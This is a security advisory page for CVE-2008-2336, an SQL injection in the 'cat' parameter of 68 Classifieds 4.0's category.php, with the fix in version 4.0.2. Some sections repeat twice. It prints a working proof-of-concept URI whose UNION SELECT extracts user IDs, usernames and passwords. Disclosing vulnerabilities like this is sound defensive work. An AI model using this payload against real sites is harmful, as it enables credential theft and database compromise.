68 Classifieds 'category.php' SQL Injection Vulnerability
BID:29249
Info
68 Classifieds 'category.php' SQL Injection Vulnerability
| Bugtraq ID: | 29249 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2336 |
| Remote: | Yes |
| Local: | No |
| Published: | May 15 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | HaCkeR_EgY |
| Vulnerable: |
68 Classifieds 68 Classifieds 4.0 |
| Not Vulnerable: |
68 Classifieds 68 Classifieds 4.0.2 |
Discussion
68 Classifieds 'category.php' SQL Injection Vulnerability
68 Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
68 Classifieds 4.0 is vulnerable; other versions may also be affected.
68 Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
68 Classifieds 4.0 is vulnerable; other versions may also be affected.
Exploit / POC
68 Classifieds 'category.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/category.php?cat=s'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,Username,Password)+from+class_users/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/category.php?cat=s'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,Username,Password)+from+class_users/*
Solution / Fix
68 Classifieds 'category.php' SQL Injection Vulnerability
Solution:
The vendor released 68 Classifieds 4.0.2 to address this issue. Please see the references for more information.
Solution:
The vendor released 68 Classifieds 4.0.2 to address this issue. Please see the references for more information.
References
68 Classifieds 'category.php' SQL Injection Vulnerability
References:
References:
- 68 Classifieds Homepage (68 Classifieds)
- Important V4.0.2 is now released - Please Upgrade ASAP (68 Classifieds)